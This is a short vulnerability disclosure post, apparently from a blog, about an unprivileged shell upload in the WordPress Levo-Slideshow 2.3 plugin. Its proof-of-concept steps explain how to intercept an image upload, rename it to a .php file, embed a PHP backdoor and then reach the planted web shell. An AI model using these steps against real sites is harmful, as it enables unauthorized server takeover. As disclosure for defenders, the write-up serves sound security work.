WordPress Levo-Slideshow 2.3 Shell Upload via Unprivileged user

Vendor: https://wordpress.org/plugins/wp-levoslideshow
Version: 2.3
Tested on: WordPress 4.5.2

Plugin Description:

WP- Levoslideshow is a wordpress Plugin is a plugin where users can display slideshow multiple instance in their post which different categories & Images.

PoC ( Proof Of Concept ):

  1. Login as an unprivileged user, who was no privilege of even uploading a plugin
  2. Go to http://site.com/wp-admin/admin.php?page=levoslideshow_manage
  3. If any Gallery exists than don’t create and go to “Category Management”, Click on “Add New”, Upload any .png / ,jpg image from your PC and intercept the request
  4. After Intercepting the request while upload, Send request to Repeater . And change filename = image.png.php and in $POST image data add your PHP Backdoor between image chunk . It should look like this exploit_levo.png
  5. Forward the request and go to site.com/wp-content/uploads/levoslideshow/[ALBUM_NUMBER]_uploadfolder/big/[YourShell] to access your shell.

    That’s it All you Have done perfect 🙂 .

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s